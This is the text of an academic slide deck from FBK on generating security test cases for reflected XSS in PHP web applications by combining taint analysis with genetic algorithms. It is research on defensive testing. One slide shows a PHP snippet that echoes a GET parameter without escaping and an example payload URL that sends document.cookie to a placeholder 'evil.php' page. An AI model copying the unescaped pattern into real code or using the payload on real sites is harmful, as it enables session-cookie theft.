Professional Documents
Culture Documents
[1] Andrea Avancini and Mariano Ceccato. Towards security testing with taint
analysis and genetic algorithms. In SESS 2010: Proceedings of the 2010 ICSE
Workshop on Software Engineering for Secure Systems, pages 65-71, New York,
NY, USA, 2010. ACM.
FBK- Foundation Bruno
Kessler
• FBK (more than 350 researchers)
is a research organization of the
Autonomous Province of Trento
that promotes research in the
areas of:
– science,
– technology and
– humanities
3
Software Engineering unit
• Goal oriented requirements modeling
– Norm compliant requirements
– Requirements engineering for Adaptive Software systems
– Requirements formalization/prioritization
• Agent oriented software engineering
– Tropos
• Reverse engineering and re-engineering
– Automatic migration of legacy systems
– Reverse engineering of Object Oriented systems
• Testing
– Automatic test cases generation
– Testing of (Ajax) 2.0 Web Applications
– Testing of future internet applications
– Security testing of web applications
4
Unit at a glance
People
Tenured Postdoc PhD Progs Total
5 3 6 1 15
Projects active in 2010
Name Type Duration
IBT (Info. Bancaria Trentina) Industrial 2007-2011
A-cube (Ambient Aware Assistance) PAT 2008-2011
CERN (Code quality at Alice) Industrial 2010-2012
FITTEST (Future Internet Testing) EU-FP7 2010-2013
IoS (Internet of Services) JRP 2009-2013
L’architettura delle performance Ministero 2010-2013
5
About me
• In particular I work on:
– Security testing of web applications
– Empirical studies in software engineering
– Code transformation and re-engineering
6
Towards security testing with
taint analysis and genetic algorithms
[1] Andrea Avancini and Mariano Ceccato. Towards security testing with taint
analysis and genetic algorithms. In SESS 2010: Proceedings of the 2010 ICSE
Workshop on Software Engineering for Secure Systems, pages 65-71, New York,
NY, USA, 2010. ACM.
Security vulnerabilities
• Web applications are publicly exposed to a hostile environment
• Successful attacks may cause
– Sensitive information disclosure
– Revenue loss
• XXS is one of the most prominent security vulnerability
8
Current situation
• Methodologies to formalize access control and data
confidentiality (e.g. encryption)
• Approach for intrusion detection or vulnerability
identification on the network layer
• Lack of a mature/consolidated approach on the
application layer
– Often responsibility is delegated to “experts”
– Tools used only as starting point for manual investigation
– Adoption of firewall or monitors to block suspicious activity
(similar to an anti-virus)
• Annoying for users
• Blocking only known threats
9
Static analysis
• Valuable help for manual review, it provides
starting points (candidate vulnerabilities) for
manual review
• Limitations:
– Missing evaluation of dynamic constructs
(reflective calls, pointes, …)
– Conservative approach (false positives)
– Does not provides example, but just points where
to start looking at
10
The vision
• Taking advantage of testing-specific
methodologies for security testing
– Automatic generation of test cases
– Definition of “security adequate” test suite
– Definition of security oracle
11
Contributions
• Focus on XXS reflected vulnerabilities
• We resort on search-based software
engineering, using genetic algorithms
• Generation of (security) test cases for
candidate vulnerabilities identified by static
analysis
– Test cases demonstrate how security can be
broken, valuable support for maintainer
• Validation on a case study
12
XXS example
13
XXS example
<?PHP www.mysite.com?name=Mariano
$a = $_GET[ "name" ] ; Your name is: Mariano
echo “Your name is: “;
echo $a;
?>
www.mysite.com?name=<a href=""
onclick="this.href='evil.php?data='%2Bdocument.cookie">click here</a>
14
XXS on the CFG
15
Taint analysis
16
Taint analysis
17
False positive
18
Test case generation
• Taint analysis is a good starting point
– It provides candidate vulnerabilities
– It does not provide executable example
– False positives
19
Genetic algorithms
• Individuals represent solution to the problem (tests)
• Input values are represented as chromosomes
• Fitness function to filter less suitable individuals and
preserve more suitable ones
• Recombination of more suitable individual for
generating a new population that is at least as fit as
the previous one
Initial
population
Fitness New
Crossover Mutation
calculation population
20
Fitness function
• Individual more near to the
solution are rewarded by a
higher value of fitness
function (they are more fit)
• Fitness function is approach
level:
– Number of the branches to
traverse in order to
execute/skip particular
statements
http://mysite.com?a=Mariano&b=Ceccato
21
Crossover
22
Mutation
Add pair
Remove pair
Change parameter
value
{(firstname, john), (surname, smithx3scr), (age, 23)}
23
Tool prototype
24
Sanity check with
random testing
• 50,000 test cases are generated for each vulnerability
• Random generation procedure:
– take a subset of the of the page parameters
– for each them, randomly generate a value in this way:
• Completely random
• Chose from a constant string from the application code
• We compute the approach level for each random test
• The maximum approach for each vulnerability is compared with
the one obtained with the genetic algorithm
25
Experimental results
26
Considerations
• We pass the sanity check of random testing
• If the algorithm converges, a solution is found in
less than 50 generations:
– Test cases are generated only for feasible paths
– When no solution is found either the path is infeasible
or the approach fails: manual analysis required
• Test cases trigger execution paths in which a
tainted variable is used in a sink
• A test case shows the way input data can skip
validation routines
• A test case does not exploit a vulnerability, but just
execute it.
27
Future works
• More advanced fitness functions (branch distance)
• More specific mutation operators and string
generation
– Based on syntax definition
– When strings represent date, numbers, enum…
• Integration of/comparison with concolic execution
• Generation of real attacks
• Further investigation on
– Persistent, DOM-based XSS
– SQL-injection
– CSRF
28
Conclusions
• Static analysis can be used to help manual
review (candidate vulnerable points)
• We combined it with genetic algorithms to
generate actual test cases (input values)
• Automatic test cases generation for
candidate vulnerabilities
– To show how vulnerabilities affect the code
• Implemented prototype applied on a real
PHP application
29
Questions?
30